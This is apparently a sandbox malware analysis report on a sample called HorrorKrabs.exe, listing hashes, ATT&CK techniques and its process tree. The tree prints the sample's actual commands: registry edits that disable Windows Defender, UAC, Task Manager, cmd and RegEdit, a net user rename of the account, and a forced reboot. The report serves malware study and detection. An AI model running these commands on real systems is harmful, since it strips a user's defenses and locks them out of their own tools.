216f31c18146824ec864ce1cd25980075831e6194e8fc8995554239a3070f62f

Resubmissions

28/03/2025, 01:00

250328-bcz46azxfs 10

28/03/2025, 00:55

250328-a9rzdaslz3 10

Analysis

max time kernel
9s
max time network
11s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 00:55

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

HorrorKrabs.exe
Size

31.1MB
MD5

a9ac58e28c018a526115108405f24c39
SHA1

a3e171ebb50717056d4f66507347e2fc4a812849
SHA256

d1229f89eccd5a1a3b19432deac06425c33564cf373564abbec0e5c8cfbd562e
SHA512

48e96bc307ab6beb2c84ca507a89b84cd5e146421e33ff7af9aa9086a96f806fe9b8d65dc9a5e54c18f1e9427c74255f943bea1868f39b66960741897302e0f2
SSDEEP

196608:/Bq8XWmsNIy3QT2bAx6gHux8fP1FdA29xTxVIVXAUPL7VsPBMHvUDJNkyhtTT0o5:NNsqEd9sf/llE/0NDkyhf5

Score

10^/10

defense_evasion discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 2 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	HorrorKrabs.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Disables cmd.exe use via registry modification 2 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "0"	HorrorKrabs.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	HorrorKrabs.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\Desktop\Wallpaper = "c:\\windows\\update32\\bg.bmp"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\update32\bg.bmp	cmd.exe
File opened for modification	C:\Windows\update32\bg.bmp	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HorrorKrabs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "124"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
4824	reg.exe
5052	reg.exe
4496	reg.exe
5008	reg.exe
4984	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4940	shutdown.exe
Token: SeRemoteShutdownPrivilege	4940	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5496	LogonUI.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 5312 wrote to memory of 3912	5312	HorrorKrabs.exe	89
PID 5312 wrote to memory of 3912	5312	HorrorKrabs.exe	89
PID 5312 wrote to memory of 3912	5312	HorrorKrabs.exe	89
PID 3912 wrote to memory of 4804	3912	cmd.exe	91
PID 3912 wrote to memory of 4804	3912	cmd.exe	91
PID 3912 wrote to memory of 4804	3912	cmd.exe	91
PID 3912 wrote to memory of 4892	3912	cmd.exe	92
PID 3912 wrote to memory of 4892	3912	cmd.exe	92
PID 3912 wrote to memory of 4892	3912	cmd.exe	92
PID 3912 wrote to memory of 5008	3912	cmd.exe	93
PID 3912 wrote to memory of 5008	3912	cmd.exe	93
PID 3912 wrote to memory of 5008	3912	cmd.exe	93
PID 3912 wrote to memory of 4984	3912	cmd.exe	94
PID 3912 wrote to memory of 4984	3912	cmd.exe	94
PID 3912 wrote to memory of 4984	3912	cmd.exe	94
PID 3912 wrote to memory of 4996	3912	cmd.exe	95
PID 3912 wrote to memory of 4996	3912	cmd.exe	95
PID 3912 wrote to memory of 4996	3912	cmd.exe	95
PID 3912 wrote to memory of 4824	3912	cmd.exe	98
PID 3912 wrote to memory of 4824	3912	cmd.exe	98
PID 3912 wrote to memory of 4824	3912	cmd.exe	98
PID 3912 wrote to memory of 3920	3912	cmd.exe	99
PID 3912 wrote to memory of 3920	3912	cmd.exe	99
PID 3912 wrote to memory of 3920	3912	cmd.exe	99
PID 3920 wrote to memory of 3940	3920	net.exe	100
PID 3920 wrote to memory of 3940	3920	net.exe	100
PID 3920 wrote to memory of 3940	3920	net.exe	100
PID 3912 wrote to memory of 2208	3912	cmd.exe	101
PID 3912 wrote to memory of 2208	3912	cmd.exe	101
PID 3912 wrote to memory of 2208	3912	cmd.exe	101
PID 3912 wrote to memory of 5052	3912	cmd.exe	102
PID 3912 wrote to memory of 5052	3912	cmd.exe	102
PID 3912 wrote to memory of 5052	3912	cmd.exe	102
PID 3912 wrote to memory of 4496	3912	cmd.exe	103
PID 3912 wrote to memory of 4496	3912	cmd.exe	103
PID 3912 wrote to memory of 4496	3912	cmd.exe	103
PID 3912 wrote to memory of 4940	3912	cmd.exe	104
PID 3912 wrote to memory of 4940	3912	cmd.exe	104
PID 3912 wrote to memory of 4940	3912	cmd.exe	104

System policy modification 1 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	HorrorKrabs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\HideFastUserSwitching = "1"	HorrorKrabs.exe

C:\Users\Admin\AppData\Local\Temp\HorrorKrabs.exe
"C:\Users\Admin\AppData\Local\Temp\HorrorKrabs.exe"
1⤵
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
- System policy modification
PID:5312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\krabsetup.bat" "
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\windows\update32\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:4804
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4892
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5008
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4984
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - System Location Discovery: System Language Discovery
    PID:4996
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4824
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"MR KRABS WAS HERE!"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"MR KRABS WAS HERE!"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3940
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
    3⤵
    - Disables cmd.exe use via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4496
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4940

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa395f855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bg.bmp

Filesize
11.7MB

MD5
009b9f7e5b7b45674e6de11dfbc5873d

SHA1
fc848c11b0eb1c48b6e49e59bfb2df069ccf7756

SHA256
5b40b1922ac983f07ecc3e444813734aa03ce3270b7e5c0dc93610e34ed58de7

SHA512
cfe2087b0711a5d7ce486f338c49d5c6147b3c931f13b3ba27628200f26c3a9776de91a1cabd7bfd274a08fbe7b8a4f9ec172e4f7cfbf3234c8aa35399d03549

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabsetup.bat

Filesize
1KB

MD5
7f5a110ccd8737cebf3f52b49424eecc

SHA1
67a0a8ef8745e20b1cc100a2ab95cde32ad7959a

SHA256
2ae0d42a78a32d4f8f81060cbe29b95eff8a90031690d2b7cc70d540a6110d03

SHA512
68d4d79c3007b50dcbd783f6e3020b8e640613c79943c8cf82456dcb7892baf0466b4f2dba4a3b9da6240cb305acdb3c9000f7b80bf63649ade767d8963476c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabslol.exe

Filesize
19.3MB

MD5
e1a919b2c68ec9e615b390adb8064bf0

SHA1
a0cab57b6bdbe2dcb888ea07fe4ed161916f6398

SHA256
6166b3e0ec7478ac54b33edaf001fb2421f15a559bcc0f37f09c08a4e466fda8

SHA512
3e837cd486806d63516488b2ac0a514e2e03bf3d7c511a7aa6c532c0569580cfbe81311d57b4a3621ee151806994e0935cf2528fadfe275a8a9a3242610a4279

Download Submit
memory/5312-0-0x000000007468E000-0x000000007468F000-memory.dmp

Filesize
4KB

Download
memory/5312-1-0x0000000000AD0000-0x00000000029F8000-memory.dmp

Filesize
31.2MB

Download
memory/5312-2-0x0000000007380000-0x000000000741C000-memory.dmp

Filesize
624KB

Download
memory/5312-3-0x0000000007E90000-0x0000000008434000-memory.dmp

Filesize
5.6MB

Download
memory/5312-4-0x00000000079C0000-0x0000000007A52000-memory.dmp

Filesize
584KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads